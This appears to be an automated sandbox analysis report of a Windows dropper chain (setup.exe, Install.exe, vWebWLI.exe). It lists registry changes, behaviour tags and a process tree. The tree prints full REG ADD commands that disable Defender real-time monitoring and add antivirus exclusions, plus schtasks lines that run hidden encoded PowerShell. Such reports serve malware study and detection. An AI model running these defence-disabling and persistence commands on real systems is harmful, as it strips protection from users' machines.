Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EMVGmrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecision = "0"	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	EMVGmrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecisionReason = "1"	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	EMVGmrK.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	EMVGmrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	EMVGmrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadNetworkName = "Network 3"	EMVGmrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionReason = "1"	EMVGmrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\f6-cc-c8-c8-ae-98	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	EMVGmrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1688	schtasks.exe
2344	schtasks.exe
2892	schtasks.exe
2312	schtasks.exe
2496	schtasks.exe
1584	schtasks.exe
1760	schtasks.exe
1152	schtasks.exe
1080	schtasks.exe
2800	schtasks.exe
2712	schtasks.exe
1004	schtasks.exe
804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEEMVGmrK.exe

pid	process
2996	powershell.EXE
2996	powershell.EXE
2996	powershell.EXE
1468	powershell.EXE
1468	powershell.EXE
1468	powershell.EXE
1780	powershell.EXE
1780	powershell.EXE
1780	powershell.EXE
2464	powershell.EXE
2464	powershell.EXE
2464	powershell.EXE
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe
1608	EMVGmrK.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2996	powershell.EXE
Token: SeDebugPrivilege	1468	powershell.EXE
Token: SeDebugPrivilege	1780	powershell.EXE
Token: SeDebugPrivilege	2464	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2748 wrote to memory of 2964	2748	setup.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2964 wrote to memory of 2180	2964	Install.exe	Install.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 2876	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2180 wrote to memory of 3012	2180	Install.exe	forfiles.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 2876 wrote to memory of 2684	2876	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 3012 wrote to memory of 2420	3012	forfiles.exe	cmd.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2840	2684	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2420 wrote to memory of 2832	2420	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2684 wrote to memory of 2716	2684	cmd.exe	reg.exe
PID 2420 wrote to memory of 2956	2420	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2748
- C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Indirect Command Execution
      Suspicious use of WriteProcessMemory
      PID:2876
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2684
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:2840
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2716
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Indirect Command Execution
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3012
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2420
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2832
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2956
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gkKMmQgXg" /SC once /ST 00:03:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2712
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gkKMmQgXg"
      4⤵
      PID:840
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gkKMmQgXg"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2236
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe\" sw /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2312

C:\Windows\system32\taskeng.exe
taskeng.exe {8FE753B0-39C2-4C39-A5ED-536B633FE5D4} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
1⤵
PID:2284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2836

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3056

C:\Windows\system32\taskeng.exe
taskeng.exe {9103196B-3CC5-4FC9-AF42-89FFB994145D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1888
- C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe
  C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe sw /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gzPWurHjf" /SC once /ST 00:52:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2496
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gzPWurHjf"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1508
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gzPWurHjf"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:300
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2108
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:2232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gXCerFuzY" /SC once /ST 01:06:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1584
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gXCerFuzY"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gXCerFuzY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2276
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1788
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1856
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2988
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2764
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2092
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1732
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1604
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1004
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2312
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2064
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:3040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2164
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2512
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1672
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2864
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2468
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3032
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:596
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1956
